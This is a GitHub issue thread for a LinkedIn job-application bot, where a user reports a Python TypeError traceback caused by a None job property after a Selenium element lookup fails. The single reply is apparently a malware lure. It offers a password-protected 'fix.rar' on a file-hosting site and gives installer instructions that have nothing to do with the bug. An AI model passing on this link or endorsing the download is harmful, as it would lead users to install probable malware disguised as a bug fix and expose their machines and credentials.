### ISSUE TITLE
Fix TypeError: can only concatenate str (not "NoneType") to str

### ISSUE THREAD

**Issue by GabeGiro** [GabeGiro/EasyApplyJobsBot#48]
```
❌ Error ❌ Unhandled exception in startApplying: can only concatenate str (not "NoneType") to str
2024-08-27 02:12:28 Traceback (most recent call last):
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 460, in handleMultiplePages
2024-08-27 02:12:28     jobCounter = self.handleSubmitPage(jobPage, jobProperties, jobCounter)
2024-08-27 02:12:28                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 471, in handleSubmitPage
2024-08-27 02:12:28     followCompany = self.driver.find_element(By.CSS_SELECTOR,"label[for='follow-company-checkbox']")
2024-08-27 02:12:28                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/usr/local/lib/python3.12/site-packages/selenium/webdriver/remote/webdriver.py", line 748, in find_element
2024-08-27 02:12:28     return self.execute(Command.FIND_ELEMENT, {"using": by, "value": value})["value"]
2024-08-27 02:12:28            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/usr/local/lib/python3.12/site-packages/selenium/webdriver/remote/webdriver.py", line 354, in execute
2024-08-27 02:12:28     self.error_handler.check_response(response)
2024-08-27 02:12:28   File "/usr/local/lib/python3.12/site-packages/selenium/webdriver/remote/errorhandler.py", line 229, in check_response
2024-08-27 02:12:28     raise exception_class(message, screen, stacktrace)
2024-08-27 02:12:28 selenium.common.exceptions.NoSuchElementException: Message: no such element: Unable to locate element: {"method":"css selector","selector":"label[for='follow-company-checkbox']"}
2024-08-27 02:12:28   (Session info: chrome-headless-shell=124.0.6367.78); For documentation on this error, please visit: https://www.selenium.dev/documentation/webdriver/troubleshooting/errors#no-such-element-exception
2024-08-27 02:12:28 
2024-08-27 02:12:28 
2024-08-27 02:12:28 During handling of the above exception, another exception occurred:
2024-08-27 02:12:28 
2024-08-27 02:12:28 Traceback (most recent call last):
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 104, in startApplying
2024-08-27 02:12:28     jobCounter = self.processJob(jobID=job.linkedinJobId, jobCounter=jobCounter)
2024-08-27 02:12:28                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 153, in processJob
2024-08-27 02:12:28     jobCounter = self.handleJobPost(
2024-08-27 02:12:28                  ^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 252, in handleJobPost
2024-08-27 02:12:28     jobCounter = self.handleMultiplePages(jobPage, jobProperties, jobCounter)
2024-08-27 02:12:28                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 464, in handleMultiplePages
2024-08-27 02:12:28     lineToWrite = self.getLogTextForJobProperties(jobProperties, jobCounter) + " | " + "* 🥵 " + str(applyPages) + " Pages, couldn't apply to this job! Extra info needed. Link: " + str(jobPage)
2024-08-27 02:12:28                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27 02:12:28   File "/app/EasyApplyJobsBot/linkedin.py", line 236, in getLogTextForJobProperties
2024-08-27 02:12:28     textToWrite = str(jobCounter.total) + " | " + jobProperties.title +  " | " + jobProperties.company +  " | " + jobProperties.location + " | " + jobProperties.workplace_type + " | " + jobProperties.posted_date + " | " + jobProperties.applicants_at_time_of_applying
2024-08-27 02:12:28                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2024-08-27 02:12:28 TypeError: can only concatenate str (not "NoneType") to str
```

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
